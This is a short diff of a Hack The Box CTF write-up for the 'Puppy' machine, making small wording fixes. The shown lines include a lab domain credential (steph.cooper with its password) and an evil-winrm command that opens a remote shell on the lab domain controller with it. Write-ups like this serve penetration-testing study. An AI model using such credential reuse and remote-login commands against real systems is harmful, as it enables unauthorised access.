meringue7/Writeups/HTB/Puppy/Puppy.md

 SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\steph.cooper:ChefSteph2025!
 ```

-These credentials worked.
+These credentials worked:
 `steph.cooper:ChefSteph2025!`

-Also, I can connect on the DC with WinRM.
+Also, I can connect to the DC with WinRM.

 ```bash
 # evil-winrm -u steph.cooper -p 'ChefSteph2025!' -i 10.129.232.75